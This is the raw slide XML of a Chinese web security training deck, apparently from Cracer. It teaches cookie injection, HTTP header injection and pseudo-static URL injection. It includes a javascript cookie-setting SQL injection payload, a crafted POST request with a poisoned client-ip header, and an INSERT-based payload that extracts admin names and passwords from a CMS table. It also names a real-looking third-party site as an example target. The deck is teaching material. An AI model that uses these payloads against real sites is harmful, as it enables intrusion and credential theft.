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5" r:id="rId2"/>
    <p:sldId id="296" r:id="rId3"/>
    <p:sldId id="297" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="262" r:id="rId7"/>
    <p:sldId id="263" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="310" r:id="rId10"/>
    <p:sldId id="311" r:id="rId11"/>
    <p:sldId id="298" r:id="rId12"/>
    <p:sldId id="299" r:id="rId13"/>
    <p:sldId id="300" r:id="rId14"/>
    <p:sldId id="301" r:id="rId15"/>
    <p:sldId id="302" r:id="rId16"/>
    <p:sldId id="303" r:id="rId17"/>
    <p:sldId id="278" r:id="rId18"/>
    <p:sldId id="304" r:id="rId19"/>
    <p:sldId id="279" r:id="rId20"/>
    <p:sldId id="280" r:id="rId21"/>
    <p:sldId id="336" r:id="rId22"/>
    <p:sldId id="337" r:id="rId23"/>
    <p:sldId id="338" r:id="rId24"/>
    <p:sldId id="339" r:id="rId25"/>
    <p:sldId id="305" r:id="rId26"/>
    <p:sldId id="281" r:id="rId27"/>
    <p:sldId id="306" r:id="rId28"/>
    <p:sldId id="282" r:id="rId29"/>
    <p:sldId id="283" r:id="rId30"/>
    <p:sldId id="284" r:id="rId31"/>
    <p:sldId id="285" r:id="rId32"/>
    <p:sldId id="307" r:id="rId33"/>
    <p:sldId id="286" r:id="rId34"/>
    <p:sldId id="308" r:id="rId35"/>
    <p:sldId id="292" r:id="rId36"/>
    <p:sldId id="293" r:id="rId37"/>
    <p:sldId id="309" r:id="rId38"/>
    <p:sldId id="294"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8BE4"/>
    <a:srgbClr val="7DE2E7"/>
    <a:srgbClr val="C5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2524714" y="2500439"/>
            <a:ext cx="7142573" cy="1009524"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2524714" y="3602038"/>
            <a:ext cx="7142573" cy="561811"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">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0" y="6603102"/>
            <a:ext cx="12192000" cy="254898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="5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安全培训         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>http://www.cracer.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386080" y="544830"/>
            <a:ext cx="7017385" cy="616585"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3600" b="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717550" y="1570956"/>
            <a:ext cx="10515600" cy="4207859"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE4"/>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B3C58B-1263-4BF1-AC00-D94967AC2837}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2020/5/9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B52E82-1B0D-4500-9A39-2FD7D9C8CFF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www.cracer.com/xxx_html_id+123" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zcb.sxjgjt.com.cn/index.php/Index/Ndetails/class/news/htmls/moving/id/1131"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cracer.com/new.asp?id=1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flipV="1">
            <a:off x="1664970" y="4050665"/>
            <a:ext cx="8407400" cy="5715"/>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664970" y="1818640"/>
            <a:ext cx="8468995" cy="1905"/>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928806" y="4956329"/>
            <a:ext cx="2111232" cy="478972"/>
            <a:chOff x="4909756" y="5374159"/>
            <a:chExt cx="2111232" cy="478972"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="流程图: 终止 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4909756" y="5374159"/>
              <a:ext cx="2111232" cy="478972"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartTerminator">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1BA0C9"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1BA0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5217096" y="5414799"/>
              <a:ext cx="1496695" cy="397510"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1BA0C9"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91436" tIns="45718" rIns="91436" bIns="45718" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="456565"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>BY    Cracer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3106" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2251075" y="2193290"/>
            <a:ext cx="7235825" cy="1439863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1BA0C9"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="914400" lvl="0" indent="-914400" algn="ctr" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="4500" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="方正综艺简体" charset="-122"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="方正综艺简体" charset="-122"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>安全测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其他注入类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204"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cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>手工注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>清空地址栏，输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>="id="+escape("30and 1=2"))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，然后去掉？id=1556输入http://soft.XXXXX.edu.cn/list.asp，返回正常</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>javascript:alert(document.cookie=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>+escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>1556 and 1=2 select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,,27,28,29,30 from admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求中存在注入的参数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>User-agent </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Referer      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>X-Forwarded-For </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>lient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>ip   </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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发现方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>抓包添加污染参数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>火狐插件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>modify headers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>tamper data </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5993765" y="2015745"/>
            <a:ext cx="5360035" cy="37757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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="65000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>POST /uploads/comment.php?act=send HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Host: 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Accept-Encoding: gzip, deflate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Cookie: PHPSESSID=caiu1hm6vu2mp9b5m019ku9107</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client-ip:1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Content-Type: application/x-www-form-urlencoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Content-Length: 63</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>mood=6&amp;comment=test&amp;id=1&amp;type=1&amp;submit=%CC%E1%BD%BB%C6%C0%C2%DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5901579" y="3623416"/>
            <a:ext cx="5900051" cy="145905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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>构造分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>INSERT INTO blue_comment (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) VALUES ('', '1', '0', '1', '6', 'test', '1480988752', '111'', '1')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>a','xxx'),('','1','1','1','2',(select concat(admin_name,0x3a,pwd) from blue_admin limit 0,1),'1645457407','sss','1')#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http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="内容占位符 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657599" y="2024590"/>
            <a:ext cx="4874177" cy="354593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flipV="1">
            <a:off x="1664970" y="4050665"/>
            <a:ext cx="8407400" cy="5715"/>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758950" y="2031365"/>
            <a:ext cx="8468995" cy="1905"/>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067810" y="2840355"/>
            <a:ext cx="5627370" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>伪静态注入的挖掘</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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伪静态注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://zcb.sxjgjt.com.cn/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://zcb.sxjgjt.com.cn/index.php/Index/Ndetails/class/news/htmls/moving/id/1131.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://zcb.sxjgjt.com.cn/index.php/Index/Ndetails/class/news/htmls/moving/id/1131</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.cracer.com/xxx_html_id+123</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cracer.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sfcxdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sfsdfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/?445.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Aspcms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>phpweb</a:t>
            </a:r>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flipV="1">
            <a:off x="1664970" y="4050665"/>
            <a:ext cx="8407400" cy="5715"/>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758950" y="2031365"/>
            <a:ext cx="8468995" cy="1905"/>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067810" y="2840355"/>
            <a:ext cx="5627370" cy="460375"/>
